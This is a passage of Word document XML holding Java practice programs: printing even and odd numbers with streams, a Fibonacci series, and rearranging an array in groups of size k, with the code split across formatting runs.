      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FD4B0" w14:textId="77777777" w:rsidR="003E52D4" w:rsidRPr="00CE4B95" w:rsidRDefault="003E52D4" w:rsidP="003E52D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B885DFE" w14:textId="016B34DD" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="319" w:name="_Toc196307799"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="002C08B0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Print even and odd numbers using java 8 stream API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="45AD97BF" w14:textId="556ED991" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2D7258" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="7D885B4E" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323A828" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F70B3B" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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venOddUsingStream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576A448" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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38953CB" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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number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4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64</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75</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06607355" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D353C86" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Even Numbers:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5FC6CF" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        numbe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p>
    <w:p w14:paraId="7B5ABCC7" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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il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6309065E" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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orEach</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p>
    <w:p w14:paraId="6C462986" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3F0AA" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Odd Numbers:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442494AE" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        numbe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p>
    <w:p w14:paraId="4A68B8C4" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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il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2E852413" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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orEach</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p>
    <w:p w14:paraId="44C5C3D2" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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9DFBC52" w14:textId="02003D25" w:rsidR="00C01D88" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AD17E" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01D88" w:rsidP="00C01D88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BFEE31" w14:textId="02D3B797" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc196307800"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00614775" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Fibonacci series</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>
    </w:p>
    <w:p w14:paraId="500EAEF5" w14:textId="1B880169" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65086530" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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ibonacciSerie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E1EDADA" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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0BE8CB3" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Number of terms to print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39288F03" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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b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640333B7" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E3D436" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Fibonacci Series up to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terms: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64510890" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C25A33" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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20B20DC" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF85298" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14854D50" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Next term = sum of previous two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3C376" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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x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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E780F" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70AA65" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            b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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945C175" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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41B5409" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95"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C1C6C2A" w14:textId="4D40EC75" w:rsidR="00183269" w:rsidRPr="00CE4B95"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1DABF927" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95" w:rsidRDefault="00183269" w:rsidP="00183269">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F35269" w14:textId="5A6D5C50" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc196307801"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EB2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="009477BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reverse</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EB2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> array in groups of a given size k</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>
    </w:p>
    <w:p w14:paraId="1EFA9D3B" w14:textId="77777777" w:rsidR="007D5F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15" w:rsidP="007D5F04">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="007D5F04" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to perform Reverse an array in groups of given size?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EAA2B" w14:textId="437FFDBB" w:rsidR="007D5F04" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5F04" w:rsidP="007D5F04">
      <w:pPr>
        <w:ind w:left="360"/>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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidR="009A6418" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>[1,2,3,4,5,6,7] where k=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD5B57" w14:textId="4A6145BB" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5F04" w:rsidP="007D5F04">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5,6,7,1,2,3,4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695E03D" w14:textId="627DB601" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB82E58"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p>
    <w:p w14:paraId="43D6BED5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063DB8E"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everseInGroup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1EA98D3"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FF5A003"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4</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6</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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D083FE5"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k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p>
    <w:p w14:paraId="208825DC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22213174"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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> group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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E730262"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F623C"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tep 1: Divide array into groups of size k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD882B9"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61BAE66"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group</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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE6BED"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j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j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k </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> j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17F3A05"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group</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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E179E7"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D0E7393"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xml:space="preserve">            group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roup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74B462"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E38CF3F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54736DD7"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tep 2: Move the last group to the front</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B49B5A8"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ollection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otat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roup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rotate right by 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CAE519"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C39552"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tep 3: Flatten the groups into final list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11444F32"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resul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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EF3EE"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group</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group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1009EDE"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xml:space="preserve">            resul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ddAll</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roup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
